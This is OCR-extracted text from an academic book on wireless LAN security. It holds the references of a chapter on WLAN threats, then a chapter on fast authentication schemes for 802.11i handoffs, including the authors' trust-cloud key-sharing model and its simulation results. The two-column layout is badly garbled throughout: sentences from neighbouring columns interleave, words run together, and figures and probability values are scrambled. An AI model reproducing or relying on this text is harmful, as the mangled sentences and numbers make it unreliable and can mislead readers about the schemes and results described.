96 Kbytes 32 Kbytes ROM, 32 Kbytes E2PROM) help bring down their risks to a manageable level.
processes the EAP-TLS protocol in about 5 seconds In early 2006, therefore, ISO members voted the
(Urien & Badra, 2006). Note that benchmarks are IEEE’s 802.11i standard for adoption.
performed on a 1 GHz Intel processor PC and only
about 50 ms are required to execute an EAP-TLS
session. This demonstrates the cost and perform- rEfErEncEs
ance influence of using smart cards, which are
required for credentials and private data storing. 802.1X. (2004). IEEE Standards for local and
metropolitan area networks: Port based network
access control (IEEE Std 802.1X-2004).
conclusIon 802.11i. (2004). Institute of electrical and electron-
ics engineers, supplement to standard for telecom-
Wireless technologies have evolved phenomenally munications and information exchange between
over the last few years. Wireless transmission has systems:LAN/MANspecificrequirements.Part: 1
a big impact on new services and applications Wireless LAN medium access control (MAC) and
because it is the method for data communication physicallayer(PHY)specifications:Specification
for, among others, cellular phones, text pagers, for enhanced security (IEEE 802.11i).
and Wireless LAN 802.11. In this chapter, we
focused on WLAN security threats, which extend Aboba, B., Blunk, L., Vollbrecht, J., Carlson, J., &
onseverallevels,fromtheidentityspoofing toH.
Levkowetz, the(2004). Extensible authentication
trafficanalysis. protocol (EAP) (RFC 3748).
0
Security in WLAN
Aboba, B., &. Calhoun, P. (2003). RADIUS (remote Comm,5The

02 FirstInternationalConference
authentication dial in user service) support for on Security and Privacy for Emerging Areas in
extensible authentication protocol (EAP) (RFC Communication Networks, Athens, Greece, (pp.
3579). 3-12).
Aboba, B., & Simon, D. (1999). PPP EAP TLS Hajjeh, I., & Badra, M. (in press). Identity pro-
authentication protocol (RFC2716). tection ciphersuites for transport layer security
(IETF Draft).
Arbaugh, W., Shankar, N., & Wan, Y. (2001). Your
802.11 wireless network has no clothe. Retrieved Haverinen, H., & Salowey, J. (2006). EAP-SIM
October 16, 2007, from http://www.cs.umd. authentication (RFC 4186).
edu/˜waa/wireless.pdf
He, C., & Mitchell, J. C. (2004). Analysis of the
Arkko, J., & Haverinen, H. (2006). EAP-AKA 802.11i 4-way handshake. In Proceedings of the
authentication (RFC 4187). 2004 ACM Workshop on Wireless Security (pp.
34-50). New York: ACM Press.
Baghaei, N. (2003). IEEE 802.11 wireless LAN
security performance using multiple clients (Hon- Hurley, E. (2002). Company tackles wireless net-
ours Project Report). work security risks. News Writer.
Blake-Wilson, S., et. al. (2003). Transport layer Kaufman, C. (Ed.). (2005). Internet key exchange
security (TLS) extensions (RFC 3546). (IKEv2) protocol (RFC 4306).
Borisov, N., Goldberg I., & Wagner D. (2001). In- Khan, J., & Khwaja, A. (2003). Building secure
tercepting mobile communications: The insecurity wireless networks with 802.11. Indiana: Wiley.
of 802.11 by.
Miller, B. R., & Hamilton, B. A. (2002). Issues
Chandra, P. (2005). Bulletproof wireless security. in wireless security WEP, WPA and 802.11i. In
Elsevier. Proceedings of the 18th Annual Computer Security
Applications Conference.
Dierks T., & Allen, C. (1999). The TLS protocol
version 1.0 (RFC 2246). Morrison, J. D. (2002). IEEE 802.11 WLAN security
through location authentication. Naval Postgradu-
ate School.
nesses in the key scheduling algorithm of RC4
(LNCS 2259). OpenEAPSmartCard. (2006). Retrieved October
16, 2007, from http://www.infres.enst.fr/~urien/
Fogie, S. (2005). Cracking Wi-Fi protected access
openeapsmartcard/
(WPA): Part 2.
Palekar, A., Simon, D., Zorn, G., Salowey, J., Zhou,
GAO (United States General Accounting Of-
H., & Josefsson, S. (2004). Protected EAP protocol
fice).) 1 02 (. Information security: Advances and
(PEAP) version 2 (IETF Draft).
remaining challenges to adoption of public key
infrastructure technology (Report to the Chair- Rigney, C., Willens, S., Rubens, A., & Simpson, W.
man, Subcommittee on Government Efficiency, (2000). Remote authentication dial in user service
Financial Management and Intergovernmental (RADIUS) (RFC 2865).
Relations, Committee on Government Reform,
Simpson, W. (1994). The point-to-point protocol
House of Representatives).
(PPP) (RFC1661).
Grech, S., & Eronen, P. (2005). Implications of
Stahlberg, M. (2000). Radio jamming attacks
unlicensed mobile access (UMA) for GSM secu-
against two popular mobile networks. In H. Lip-
rity. In Proceedings of IEEE/Create-Net Secure-
maa & H. Pehu-Lehtonen (Eds.), Proceedings of
0
Security in WLAN
the Helsinki University of Technology. Seminar Urien, P., Badra, M., & Dandjinou, M. (2004).
on Network Security. Mobile Security. Helsinki EAP-TLS smartcards, from dream to reality. Paper
University of Technology. presented at the Fourth IEEE Workshop on Ap-
plications and Services in Wireless Networks.
UMA. (2005). Retrieved October 16, 2007, from
http://www.umatechnology.org/ Urien, P., & Pujolle, G. (2005). EAP-support in
smartcard (IETF Internet Draft).
Urien, P., & Badra, M. (2006). Secure access
modules for identity protection over the EAP-TLS WLAN. (2003). Information technology - tele-
-Smartcardbenefitsforuseranonymity - inwire
communications and information exchange
less infrastructures. In M. Malek, E. Fernández- between systems—local and metropolitan area
Medina, & J. Hernando (Eds.), SECRYPT 026, networks—specific requirements-Part: 1Wire
Proceedings of the International Conference on less LAN medium access control (MAC) and
Security and Cryptography, Setúbal, Portugal, physical layer (PHY) specifications (IEEE Std.
(pp 157-163). 802.11-2003).
WPA. (2003). Wi-Fi protected access, version
2.0.
0
0
Chapter XLIV
Access Control in Wireless
Local Area Networks:
Fast Authentication Schemes
Jahan Hassan
The University of Sydney, Australia
Björn Landfeldt
Albert Y. Zomaya
AbstrAct
Wireless local area networks (WLAN) are rapidly becoming a core part of network access. Supporting
user mobility, more specifically session continuation in changing network access point
an integral part of wireless network services. This is because of the popularity of emerging real-time
streaming applications that can be commonly used when the user is mobile, such as voice-over-IP and
Internet radio. However, mobility introduces a new set of problems in wireless environments because of
handoffs between network access points (APs). The IEEE 802.11i security standard imposes an authen-
tication delay long enough to hamper real-time applications. This chapter will provide a comprehensive
study on fast authentication solutions found in the literature as well as the industry that address this
problem. These proposals focus on solving the mentioned problem for intradomain handoff scenarios
where the access points belong to the same administrative domain or provider. Interdomain roaming is
also becoming common-place for wireless access. We need fast authentication solutions for these en-
vironments that are managed by independent administrative authorities. We detail such a solution that
explores the use of local trust relationships to foster fast authentication.
Access Control in Wireless Local Area Networks: Fast Authentication Schemes
IntroductIon & Arbaugh, 2004). The delay can only increase

when the AAA server is located at the ISP’s site,
Wireless local area networks (WLAN) are rapidly topologically far from the AP site. The longer
becoming a core part of enterprise network access. the delay in handoffs, the longer the outage time
The IEEE 802.11 standardization has lead to vendor experienced by applications. While this kind of
interoperability and rapidly plummeting prices, delay is acceptable for applications with exible fl
making wireless access an economically tantalizing response time requirements, emerging real-time
alternative to wired access. Currently, enterprise applications, such as wireless voice-over-IP, have
deployment incorporates support for mobility be- stringent delay requirements (Cisco IP phone).
tween access points (AP) as well as security and Thus, this kind of network delay and outages are
monitoring solutions. Mobility introduces a new set detrimental for real-time applications, especially
of problems, not present in a wired infrastructure, in frequent handoff scenarios, which hinders the
due to handoffs between network access points. success of wireless local networks to support such
The implications of frequent handoffs to different popular applications.
APs is that for communication security, the IEEE The aim of this chapter is, therefore, to provide
802.11 standard requires that the mobile node (MN) readers with state-of-the-art knowledge on this
has to undergo a full authentication process each significant issue, and solutions as found in the
time it wants to connect to a new AP. The recent industry and literature. The mentioned issue arises
security ratifications from the IEEE task fromgroup i
two directions: (1) intradomain handoffs
(TGi)(IEEEi,
1 .208 defined
) 0 24 severalsecurity and (2) interdomain handoffs. Thus solutions are
remedies for WLANs in the standard IEEE802.11i. needed for both. While various solutions have been
According to this standard, the complete (full) mostly proposed for the first direction, we will
authentication process involves the use of 802.1X show that interdomain, or interprovider handoffs
port-based access control architecture, and pro- arebecomingacommonplaceandneedspecific
vides mechanisms for key management (IEEE solutions that are different from the intradomain
802.1X, 2001). An AAA server such as RADIUS solutions because of the involvement of more than
(Rigney, Willats, Rubens, & Simpson, 2000; one administrative authority in the latter cases.
Rigney, Willats, & Calhoun, 2000) is to be used To reduce the handoff delays due to the ex-
for authentication and key derivation. Following changes of authentication messages when a MN
a successful authentication, the MN and the AP hands off to a new AP (nAP), there have been several
are to undertake a four-way handshake protocol proposals from the industry and the research com-
for deriving various encryption keying material. munity. These solutions are targeted for providing
Keying material derived in this way then is used fast access when changing APs belong to the same
in the encrypted (secure) communication sessions administrative network domain.
between an AP and the MN. Thus the four-way However, handoffs within a single domain
handshake, which does not involve the AAA server, might not always be the case. There are possible
is a must in each secure association of an MN to scenarios where different service providers need
the AP and cannot be avoided. to collaborate to provide continuous connectivity
However, the authentication process, suggested to roaming users for supporting seamless services.
in thei 1 2.08 ratifications using
extensible au- In addition, IEEE 802.11 has lead to price levels
thentication protocol (EAP) over transport layer suitable for the mass consumer market and small
security (TLS) can introduce significantoperators. handoff This has caused an explosive trend in the
delays because it involves the exchange of a round deployment of residential gateways (RG) for home
of messages between the MN and the AAA server networking and wireless hotspots at city areas by
via the AP. It has been shown that a full EAP- various business owners and hotspot providers.
TLS authentication (i.e., the full authentication) The capacity offered by these APs and resi-
can take as long as 1.1 seconds (Mishra, Shin, dential gateways (RGs) at various sites may not

be fully utilized since the traffic - patterns

mation on the typiport-based authentication-driven
cally vary considerably over the course of a day. access control as suggested in IEEE802.11i, the
Thus, there will be unutilized capacity that could security ratifications from the IEEE task group
be offered to active users despite not being their i. This section equips the reader with the funda-
serving provider or AP. mentals of the authentication-based access control
In this model, each WLAN site that is connected process using 802.1X architecture. In the third
to the Internet via an individual RG or AP can be section we elaborate fundamental proposals found
considered as an individual domain as RGs are in the literature that provide fast-authentication
owned by individual residential consumers and schemes applicable in the intradomain handoffs.
wireless routers (or APs) at hotspots belong to This section also contains a subsection on com-
individual providers or businesses. An example of parative analysis of the presented proposals. In
a current operational commercial system building the fourth section we provide a possible direction
on this principle is the FON (FON Web site) com- that we have proposed for solving the interdomain
munity where individual subscribers share excess handoff latency problem because of authentication
capacity with the global FON community and FON delays. We sketch some open issues, and finally,
itself provides billing support so that used capacity we conclude this chapter.
is billed to a user’s own account.
If the current deployment trend continues, in
denseresidentialareasitwillbecommon tofindAutHEntIcAtIon
IEEE 802.11I
a substantially large number of RGs within range. ProcEss
This also provides the opportunity for load-shar-
ing or load-balancing among the RGs by handing In this section, we provide fundamental informa-
off some visiting connections to other RGs within tion on the authentication-based access control
range when the original RG’s link utilization or load mechanismforIEEE8i, 1 2.0 thesecurityratifica-
increases and affects its home traffic.tions Therefore,
from IEEE802.11. IEEE 802.11i includes the
we see stationary handoff scenarios emerging in use of the architectural framework of IEEE802.1X,
the multiowner RG access network architecture, the port-based network access control standard
which can also apply to the commercial city area for different link layer technologies such as IEEE
hotspots. Depending on the load variation, there 802.3, FDDI, IEEE802.11, and so forth. In the
may be situations when during an active session a standard, there are three entities involved in the
visiting mobile node will have to undergo frequent authentication process: the supplicant or the user
handoffs to many new RGs. The same applies to wireless device, the authenticator or the network
the city area hotspot architecture. port (wireless access point), and the authentica-
The previous proposals and implementations tion server such as the RADIUS server. Figure 1
mentioned above aim at supporting a single domain shows this setup. The 802.1X standard uses exten-
where centralized control is an advantage. In the sible authentication protocol (Blunk, Vollbrecht,
collaborating scenarios between service providers Aboba, Carlson, & Levkowetz, 2003) to support
this is not the case since each domain has its own a variety of authentication mechanisms, of which
authentication mechanisms that are closed to other the transport layer security (TLS) providing strong
parties. In the RG access network or the city area encryption and authentication at the transport layer
hotspot architecture, such centralized control is is the most commonly used mechanism (EAP-TLS)
not possible since each RG or AP is under its own (Aboba & Simon, 1999) within 802.11 networks.
authority and administration. Hence, a distributed Next, we look at the functionalities of the entities
approach is required for multiowner and multipro- of the 802.1X framework in light of the 802.11
vider handoff scenarios. network setting:
The rest of the chapter is organized as follows.
In the next section we provide background infor-

Figure 1. 802.1X setup
Authentication Server
(e.g., RADIUS)
Wireless AP
(Authenticator)
Secure
Network
EAP over RADIUS
Wireless link
EAP over LAN
Wireless device
(Supplicant)
Figure 2. EAP-TLS authentication messages
Authentication Server
Wireless device Wireless AP (e.g., RADIUS)
(Supplicant) (Authenticator)
EAPOL-Start
EAP-Request Identity
EAP-Response Identity Authentication

EA/TLS-Start phase involving
delay
EAP/TLS: Chello
EAP/TLS: Shello, SCert, done
EAP/TLS: Cert, change cipher, finished 802.1X
EAP/TLS: Change cipher, finished
EAP/TLS: Empty
EAP-Success
Fourway
Fourway Handshake
Handshake 802.11i

• Supplicant: This is a user device seeking function which will be used to generate additional
link layer connectivity with a network so keying material. Using this function and the MK,
that it can use the services offered by the a pair-wise maser key (PMK) is generated. The
network. PMK further produces four pair-wise transient
• Authenticator: This is the wireless AP keys (PTKs) when used with particular cipher
providing link layer connections to the user methods, and are used for origin authenticity and
devices. In any network, typically there will confidentialityofthefour-wayhandshake - proce
be many APs. The authenticator liaises with dure, as well as for data encryption.
the authentication server by relaying infor-
mation to and from the supplicant. When the Figure 2 shows the full EAP-TLS authentica-
authenticator receives a success message from tion steps and messages exchanged. At the end of a
the authentication server, it allows the sup- successful EAP-TLS authentication (EAP success
plicant to establish a link layer connection. message), there is a four-way handshake process
• Authentication server: This is a central which ensures that the AP and the MN are active,
server which helps the authenticator with guarantees the freshness and synchronization of
the authentication decision based on what it the shared encryption key, as well as binds the
knows about the supplicant and the informa- PMK to the medium access control (MAC) ad-
tion supplied by the supplicant. dress of the MN.
As EAP, and in particular EAP-TLS, serves

as the authentication building block for strong IntrAdoMAIn fAst
authentication security, we discuss briefly these
AutHEntIcAtIon solutIons
technologies.
One of the most significant features of wireless
A. EAP: EAP communications are in the form of networksisthatitdoesnotrestrictusersto
challenge-response method. EAP uses four basic connection point (e.g., at a desk) while using the
message types: EAP request, EAP response, EAP network. As long as the user is within the coverage
success, and EAP failure. After a few rounds of area of a wireless access point or base station, the
request and response exchange, the supplicant network connection keeps alive. The predomi-
is notified of the outcome using EAP success nant mobility-friendly applications are voice and
or EAP failure. Regarding the transport of the multimedia that can be supported when the user
authentication protocols used, as EAP does not is continuously mobile. However, primarily due
have any addressing mechanism, EAP messages to this kind of mobility, the connections need to
are encapsulated in EAP over local area network be switched from one access point to the next, a
(LAN) (EAPOL) protocol between the supplicant process called handoff, when the user crosses the
and the authenticator, and as a RADIUS message coverage boundary of one AP and moves into the
(EAP over RADIUS) between the authenticator next one. Using 802.11i in wireless LANs, this
and the authentication server. means that the full EAP-TLS authentication has
to be performed each time such handoff occurs.
B. TLS: Specified in RFC2,462 when used in It is well-known that real-time applications, such
802.1X, the supplicant and the authentication server as wireless voice over IP, have stringent delay re-
will undergo a mutual authentication process. At quirements and can only tolerate moderate packet
theroot of this process arecertificates loss dueat bothof
to network outage occurring at handoffs.
these entities from a common certificate-author However, it has been reported that a full EAP-
ity (CA). The results of the mutual authentication TLS authentication process can take as long as
usingthesecertificatesaremaster astrong secret
1.1 second (Mishra et al., 2004), a number far too
key (MK), and an initial set of pseudo-random large to support the smooth operation of voice and

multimedia applications in continuous mobility tions in wireless LANs, in the current form, no
scenarios1. This number can only magnify when mechanism has been used to select the most likely
the RADIUS server is located topologically far handoff candidate APs. Thus, there will probably
from the AP. As the APs in wireless LANs have be many instances of preauthentications that will
very small coverage2, many APs are required to not be utilized at all. This is a waste of resources.
be installed to cover a certain geographical area Also, when there is a large number of candidate
of a network. Thus, continuous mobility implies APs, this mechanism does not scale and, in addi-
that there will be many handoffs during an active tion, puts extra loads on the AAA server. It is to
real-time application session, even when the user be noted that the scope of the preauthentication
is within the same network (domain). There needs is, however, limited to a single network domain
to be mechanisms to cut down the authentication or ESS, making it inapplicable in interdomain
delay of 802.11i for this kind of intradomain hand- roaming scenarios.
offs. Below we discuss the IEEE 802.11i proposed
solution, and those found in the literature to tackle Proactive key distribution
this issue.
Proactive key distribution has been proposed as
Preauthentication a mechanism to provide fast authentication at
handoffs within the same administrative domain,
Thisisthesolutionspecifiedwithinthe by IEEE8
i
1 .2 0
predistributing the keys to candidate APs in a
to support fast authentication at handoffs between neighbor graph (Mishra et al., 2004). Thus, this
APs in the same network domain or extended scheme avoids the involvement of the AAA or the
service set (ESS). In this solution, when an MN RADIUS server for distributing the keys to the
is connected with an old AP (oAP), it can initiate nAPs duringhandoffs.WhentheMNwillfinally
EAP-TLS authentication with a new AP (nAP) move to the nAP, the key will be already there and
within the same ESS by sending an IEEE 802.X the local handshake protocol (four-way handshake)
EAPOL-Start message via the oAP to the nAP. The can be used to establish the radio link between the
nAP then may initiate the EAP-TLS authentication MN and the nAP.
with the MN. The distributed system of the ESS The most important concept of this proposal is
has to be configured to forward the authentica- the use of the neighbor graph. The neighbor graph
tion messages to the oAP for the MN. While still isthedynamicidentificationofthe - mobilitytopol
connected with the oAP, preauthentication for the ogy of the network: a set of APs that the mobile
MN is performed by exchanging all the EAP-TLS user device potentially could reassociate to. The
authentication messages between the MN and the authors suggest that this set is typically a small
nAP. The process ends when after deriving the subset of all the APs in the wireless network. By
newPMK,thenAPsendsthefirstmessageofselecting the the possible candidate APs for handoffs by
four-way handshake to the MN. The MN and the a particular MN, the cost of proactively distributing
nAP must cache the new PMK to be used when the thekeytotheseAPsarejustifiedandminimized.
MN finally moves to the nAP. Preauthentication The scheme utilizes the concept of a reassociation
can be performed in advance to a group of APs relationship by which the authors mean that two
that the MN may select from, for handing off in APs have this relationship if it is physically pos-
the future. At time of handoff, there will not be sible for a given MN to handoff from one to the
any more EAP-TLS exchanges, and the four-way next. Thus, this relationship depends on factors
handshake can be used straight away to resume such as physical distance between two APs and
the connection process. placement of the APs. The authors suggest that the
While the preauthentication mechanism pro- neighbor graphs can be autonomously learned and
vides a great way to cut down the authentication maintained by the wireless network, and can be
delay necessary for supporting real-time applica- maintained either in a centralized or distributed

manner. In their implementation, the authors have nature of the schemes. The two proposals differ in
stored this information in the centralized manner, the sense that in preauthentication, it is up to the
in the RADIUS server. MN to choose (using no particular guideline) APs
The authors propose that instead of distributing in the network to complete authentication before
the original PMK to all the neighbor graph APs, it performs the next handoff, but in the case of
the PMK is used to derive PMKs depending on proactive key distribution scheme, only the APs
the instance of reassociation (e.g., nth reassocia- the neighbor graph can get the PMK (some APs
tion) using a proposed equation. Special RADIUS in the neighbor graph may decide not to ask for
messages have been also introduced to aid the key the key at this stage). Also, the predistribution of
distribution process: NOTIFY-REQUEST,-NO the PMK scheme does not involve the MN in the
TIFY-ACCEPT, and ACCESS-ACCEPT. Once the process of distributing the PMKs to the neighbor
MN completes a full EAP-TLS authentication, the graph APs, whereas the preauthentication scheme
AAAserversendsaNOTIFY-REQUESTmessage involves the MN to complete the preauthentication
to all the APs in the neighbor graph. This message process with the nAPs.
informs the APs that a given MN may roam to their
coverage. It is up to the APs to decide whether they Proactive key caching
want the security information (the PMK) for the
MN. If the AP decides to get the security infor- An industry solution, namely proactive key cach-
mation at this stage, it sends a NOTIFY-ACCEPT ing (PKC), is an extension of Airespace Inc.’s3
message to the AAA server, and the AAA server wireless enterprise platform, developed along with
sends an ACCESS-ACCEPT message in return Funk Software4 and Atheros Communications
to the AP containing the appropriate PMK and (Atheros Communications). In PKC, the MN can
an authorization for the MN to remain connected use the same master key to roam across an Aire-
to the network. From the experimental results, it space network, visiting one AP to the next. This
has been shown that the average latency of the eliminates the need for RADIUS authentication at
full authentication reduces to around 50ms from each handoff; only the four-way handshake will be
that of 1.1 second. required. Airespace has a centralized policy engine
The scheme provides a practical and feasible for creating and maintaining security parameters
way for maintaining the quality of real-time ap- across the entire enterprise. The use of the central
plications while the MN moves about in the same policy engine in the network also leads this solu-
network. However, this imposes extra functional- tion to be centralized and suitable only for a single
ity and loads on the AAA server, because it has administrative domain.
to send requests to candidate APs asking if they
want the security key for the MN before it hands Predictive Authentication
off to the APs. This centralized approach where a
single AAA server controls and manages the key This proposal from Pack and Choi (2002) is a
distribution will suit well the scenarios where the predictive-authentication scheme based on the
WLAN sites are all under the tight control of one selection of a frequent handoff region (FHR)
central AAA server such that the server can derive which works in a centralized manner. The main
and decide on the candidate APs for the MN’s next idea is to formulate a FHR consisting of a number
move. This proposal will not be directly applicable of APs in a public access LAN by using a FHR
to interdomain roaming scenarios. selection algorithm, and taking into account the
The proposal from Mishra et al. (2004) has user mobility and traffic pattern. The FHR APs
similarity with preauthentication proposal from are the ones that the MN is likely to associate with
IEEE 802.11i in the sense that (some) steps of the in the near future. The MN is preauthenticated to
authentication process is initiated even before all the APs within the FHR so that when the MN
the MN moves to the nAP, that is, the proactive handoffs from one AP to the next within that FHR,

there is no time wasted in communicating with the IntErdoMAIn fAst

RADIUS server. AutHEntIcAtIon
The authors use the notion of movement ratio
between APs which determines the handoff prob- Up until now, we have discussed proposals that are
ability of a particular AP in the network. The designed for reducing the authentication delay of
movement ratio is affected by the user mobility and the radio link layer establishment when a mobile
AP location. Movement ratio between APs can be device moves from one AP to the next within the
measured by using an event logging system which same network administrative domain. While these
logs the handoff information including login time are the most common handoffs, roaming such as in
and handoff times to different APs. Using a given wireless hotspot areas served by multiple providers
equation and the log information, the handoff ratio is becoming more common these days, especially
is then calculated. To determine the FHR APs, in the CBD areas of big cities. For example, the
the users’ service level is considered as well. If CBD areas may be covered by small business
the user can tolerate service disruptions during owners such as Starbucks, big providers such as
handoffs, less APs can be included in the FHR, T-mobile,andnonprofitproviderssuchasthecity
and vice versa. Obviously, if there are more APs council. The wireless networks (hotspots) from
in the FHR, there will be more resources used for these entities belong to different administrative
preauthenticating to them than if there were less domains. Consider the following scenario. There
APs in the FHR. Thus this differentiation based is an overlap between a public network in a coffee
on service level serves an important purpose. shop and a council-operated open wireless mesh
The key distribution in IEEE 802.1X has network. The council is providing a free service to
been modified to suit this scheme. Although the publicthe
and the coffee shop provides access to
MN sends an authentication request to the AAA paying customers. Despite the business model, for
server via its current AP, the server sends the the success of these networks, they must consider
authentication response message (EAP success supporting real-time session continuation, thus we
message) to APs in the FHR. The FHR APs keep would need solutions to make the authentication
the authentication information for the MN in soft speedy in these multidomain handoff scenarios.
state for a certain period, let us call it preauthenti- Other network setups that would require this kind
cation validity period. If the MN does not handoff of solutions can be residential neighborhood wire-
within that period, the information is no longer less networks, also known as community wireless
useful and the MN will then have to perform a networks as mentioned in the introduction section,
full authentication if it handoffs after that period where the neighbors want to share their broadband
to that AP. If the MN moves to an AP in the FHR capacity over the wireless access networks they
within the preauthentication validity period, the have at their individual premises. Such sharing
reassociation with the new AP is fast as it only has been envisioned by various researchers (e.g.,
uses the exchange of a couple of messages locally Landfeldt, 2006; Thompson, 2006; Raniwala,
between the AP and the MN. 2005).
This scheme has much similarity with the pre- The solutions discussed so far cannot be directly
authentication scheme, with the difference being applied to the interdomain handoff scenarios. The
that the predictive authentication proactively au- main reason is the tight administrative control that
thenticates to a group of APs that the MN is more the individual domains operate in. The previous
likely to handoff to, rather than just any new or next solutions also use central decision engines or cen-
APs in the network selected by the MN. Predictive tralized servers for key distribution, and so forth.
authentication is also a centralized solution in that Individual domains have their own mechanisms
the MN does not have to decide which AP(s) to to manage handoffs, and would rather keep it to
preauthenticate to; the network (the AAA server) themselves. One network does not necessarily trust
takes charge of that decision. the other when it comes to access control. To ad-

Table 1. A comparison of the fast authentication schemes

Scheme Name Initiated by # of nAPs considered nAP involvement Applicability
Preauthentication MN Variable, selected by the MN Decided by the MN Intradomain handoffs
Proactive Key distribution RADIUS server A subset of APs in the network; Decided by the nAP Intradomain handoffs
determined by the neighbor graph concerned
Predictive Authentication RADIUS A subset of APs in the network; Decided by the RADIUS Intradomain handoffs
server determined by the FHR server
Proactive Key Caching Centralized policy All APs in the network Centralized policy engine
engine Intradomain handoffs
dress this gap, we have proposed a “trust-cloud” party such as an ISP or indeed through personal
key sharing model (Hassan & Landfeldt, 2006). relationships if the community does not operate
with a subscription-based model. For example,
trust-cloud key sharing in community networks, the network operation is
dictated by personal preferences, thus even if two
According to our interdomain fast-authentication AP-owners (or WLAN owners) share the same ISP,
scheme based on a concept of “trust clouds,” a there is no guarantee that they would trust each
trust cloud is formed among neighboring access other. This is the difference from neighborhood
points based on a relationship among the owners networks with federated networks such as FON.
of the access points. The scheme enables fast and In our model, the serving AP6 of a visiting
simple authentication for mobile devices that move mobile node (VN) will share the key of the MN
between access points belonging to different ad- that is currently attached with it, within its trust
ministrative domains such as different ISPs. Used cloud. So, depending on the number of APs in the
together with an appropriate routing scheme, the serving AP’s trust cloud, some of the APs in the
scheme enables continuous service of delay sensi- hotspot area will have the key of the VN ready
tiveows fl even while roaming between different to be utilized for fast authentication when the
accessproviders.Wedefinethefollowing VNterms:
hands off to one of these APs, and that AP
will share the key further among its trust cloud
Trust Link: Atrustlinkdefinesthetrust - APs.relation
In our model of interdomain access points,
5
ship between any two given RG . RGi and RGj have provider-provider (or AP-AP, or RG-RG) trust is
a trust relationship between them if they agree to not necessarily transitive: if RG X trusts RG Y
take part in key sharing for visiting mobile nodes and RG Y trusts RG Z, it does not necessarily
between them. mean that RG X trusts RG Z. Moreover, as this
trust may have to do with personal preferences, it
Trust Cloud: A trust cloud is a collection of trust is not necessary to be symmetric: RG X trusts RG
links for a given RG. Every RG has a different trust Y does not necessarily mean that RG Y trusts RG
cloud. One RG can appear in many trust clouds, X. Initially, we have simulated symmetry in the
depending on its relationship with other RGs. trust relationships between a given RG pair, and
also that trust is not transitive as it depends on the
The model is a security key-sharing scheme relationship or understanding between any given
which works on the basis of AP-to-AP (or RG-to- pair of RG (or RG-owners). This means that if RG
RG, network-to-network/ hotspot-to-hotspot) trust. X trusts RG Y, RG Y also trusts RG X. However,
Unlike the implicit trust among the APs within a we have also simulated with the symmetry being
single administrative domain or an ESS, this trust is relaxed thus two RGs may have uni- or bi-directional
not implicit and is a translation from the trust among trust relations, thus we deviate from a nondirected
the AP-owners through a relationship with a third trust graph to a directed one. By using the concept

of trust clouds in the area, we will see pockets of ress through that RG, the VN session will have to
fast authentication enabled coverage area, and not handoff to another lightly-loaded RG using one
an entire coverage area of federated fast authen- of the two trust cloud handoff algorithms, or the
tication areas. Therefore, we would still require trustless one described in the previous section. If
strong authentication mechanism provided by the no lightly loaded RGs are available, the session is
EAP-TLS in this setup as not all the handoffs will prematurely terminated.
be able to utilize fast authentication. The activity of the VN is modeled using the well
The fast-authentication for interdomain sites known on-off process. When the VN completes a
is achieved through cooperation among the trust session, or a session is prematurely terminated, the
cloud members. The approach is distributed without VN enters a silence mode before initiating another
a central authentication server being involved in session. The session and silence mode durations are
distributing the security master key to the access exponentially distributed. Mean session duration is
points belonging to the trust cloud. We have pro- denoted by S. Once the VN enters the silence mode,
posed two algorithms for mobile visiting nodes to its security association with a given RG becomes
select RGs to perform authentication at handoffs: invalid (an inactivity timer is implemented within
trust-aware and trust-unaware. In the trust-aware each RG, upon expiration of which the security
handoff algorithm, the MN needing to handoff to associations of the VN become invalid). Conse-
a new RG actively seeks to handoff to an RG that quently, the VN must go through the full security
is trusted by its prior-move RG, thus it has to keep association process (full authentication involving
track of which RGs are trusted by its prior-move the AAA server) at the start of each new session,
RG. In the trust-unaware handoff though, the MN even if it continues with the current RG.
just seeks to handoff to a suitable RG (e.g., an RG The primary performance variable that we mea-
that has low load and can accept more connections) sure is the number of times a full authentication is
but does not care about the fast authentication pos- needed for a session on average, since the goal is
sibility as the RG it hands off to may or may not to reduce this variable. This number is basically
be trusted by its prior-move RG. one (for the initial association) plus the number of
handoffs that require full authentication.
Performance Evaluation Figures 3 and 4 are two representative graphs
from our simulation studies. First of all, we see
We have carried out simulation-based perfor- that our trust-based handoff schemes, be it aware
mance evaluation. The scenarios we model are a or unaware, achieves much lower per session full
VN trying to complete a series of communication authentication than the usual no-trust or trustless
sessions by utilizing the unused capacity of nearby
RGs within its wireless communication range
(RG hotspot). There are a total of N RGs in the
hotspot area. The VN can sense the current load Figure 3. Full authentication vs. mean session
of each RG from their beacons, and can only as- time (S)
sociate with an RG that is lightly loaded. An RG
is modeled as a two-state Markov chain where the
states of an RG alternate between heavily loaded
and lightly loaded. The time spent in each state is
exponentially distributed with means (L) selected
to obtain a given fraction of time an RG spends in
the heavily loaded state7.
If an RG switches its state from lightly loaded
to heavily-loaded while a VN session is in prog-

Figure 4. Full authentication vs. mean session time open Issues

(S): Trust symmetry relaxed
The trust-cloud model provides a conceptual way
forward in solving the interdomain lengthy authen-
tication issues. However, to make this concept a
reality, much more work is required. For example,
work is needed to solve issues and answer questions
such as what governs trust between providers or
APs when we are talking about fast connection
administering from neighboring providers or APs,
how to formulate the trust groups automatically
and in a scalable manner, what is the feasibility of
implementation of such solutions, and so on. We
are currently focusing on these.
cases. Further more, Figure 3 shows a comparison

of symmetric and symmetry-relaxed trust relations conclusIon
in a hotspot area covered by 20 RGs where links
may or may not be symmetric. In this simulation, Current access control mechanisms in the stan-
we have used the same trust probability value (P) of dard for IEEE802.11 wireless local area networks
0.2 for both symmetric and asymmetric scenarios cannot support continuity of real-time streaming
(uniform trust probability). As this value is the applications in mobile environments where the
same for all these cases, we see no difference in session has to handoff from one AP to the next.
the performance. The impact of asymmetric trust Handoffs involve delay in a few steps, one being
relations comes in play when we consider differ- the authentication process. In this chapter, we
ent probability values in deciding trust links in have provided a comprehensive guide on leading
the forward and backward directions for a given proposals for reducing the authentication delay. We
pair of RGs (nonuniform). The results then deviate have covered both inter and intradomain fast-au-
from the case of symmetric trust model. We can thentication solutions. Fast-authentication solutions
observe this in Figure 4 where we have selected are an integral part of making the AP-switching
two different trust probabilities for the forward fast enough to support delay-constrained popular
direction (P1=0) .2 and the backward direction applications.
(P2=0In
.) 1 . thisfigure,asthetwotrustprobability
values are very close to each other, although we see
a difference between the asymmetric uniform and rEfErEncEs
nonuniform cases, the differences are not large. We
further simulated an asymmetric nonuniform trust Aboba, B., & Simon, D. (1999, October). PPP EAP
model which we found achieved much lower full TLS authentication protocol (RFC 2716).
authentication per session. In the uniform cases,
we used P =.2,0 while in the nonuniform cases, Atheros Communications Inc. Retrieved February
weusedP1=0and .2 P2=0Thus
.8 weseethatthe 9, 2007, from http://www.atheros.com/
